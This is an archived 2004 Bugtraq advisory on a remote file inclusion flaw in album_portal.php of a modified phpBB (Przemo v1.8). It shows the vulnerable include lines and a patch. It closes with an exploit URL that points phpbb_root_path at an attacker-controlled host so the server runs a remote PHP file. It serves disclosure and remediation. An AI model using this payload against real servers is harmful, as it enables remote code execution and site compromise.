phpBB modified by Przemo arbitary code execution

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpBB modified by Przemo arbitary code execution
From: Dariusz 'Officerrr' Kolasinski <ofi@xxxxxxxxxxxxxx>
Date: Mon, 19 Apr 2004 16:54:00 +0200
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: ofi@xxxxxxxxxxxxxx
User-agent: KMail/1.6.1

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- 
--====----====----====----====----====----====----====----====----====----===--
Product: phpBB modified by Przemo
Version: v1.8
Vendor: http://przemo.org/phpBB2/
Discover by: Officerrr  <officerrr at poligon.com.pl>
Vendor Response: Not contacted yet...
Severity: Medium (arbitary code execution as webserver user)
- 
--====----====----====----====----====----====----====----====----====----===--
Description:

This modification is based on phpBB 2.0.X script, it contains about 
200 add-ons, with ability to switch off any of them in admin`s panel.
- 
--====----====----====----====----====----====----====----====----====----===--
Vulnerable code:
File: album_portal.php

[code]
$album_root_path = $phpbb_root_path . 'album_mod/';
include($album_root_path . 'album_common.'.$phpEx);
[/code]
- 
--====----====----====----====----====----====----====----====----====----===--
Fix:

Change the following lines in album_portal.php file

[code]
$album_root_path = $phpbb_root_path . 'album_mod/';
include($album_root_path . 'album_common.'.$phpEx);
[/code]

to

[code]
define('IN_PHPBB', true);
$phpbb_root_path = './';
$album_root_path = $phpbb_root_path . 'album_mod/';
include($phpbb_root_path . 'extension.inc');
include($album_root_path . 'album_common.'.$phpEx);
[/code]
- 
--====----====----====----====----====----====----====----====----====----===--
Exploit:
http://[victim_host]/album_portal.php?phpbb_root_path=http://[evil_host]/&phpEx=/../../[evil_file.php]

evil_file.php must exist on the evil_host.

- -- 
Dariusz 'Officerrr' Kolasinski
<Linux Administrator> <gg: 516354>
"Living on a razors edge, Balancing on a ledge"
 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFAg+gI+p+rYQE3C+ARAtrqAJ9h0b/sOa/aLke3xWJw5ShvN1FyVQCfYkxh
12zpKxPTwGAX9oqUfxZ4xzI=
=/aXV
-----END PGP SIGNATURE-----

Prev by Date: RE: After Ms patches last Wed ...
Next by Date: Microsoft Help and Support Center argument injection vulnerability
Previous by thread: [slackware-security] utempter security update (SSA:2004-110-01)
Next by thread: phpBB modified by Przemo arbitary code execution
Index(es):
- Date
- Thread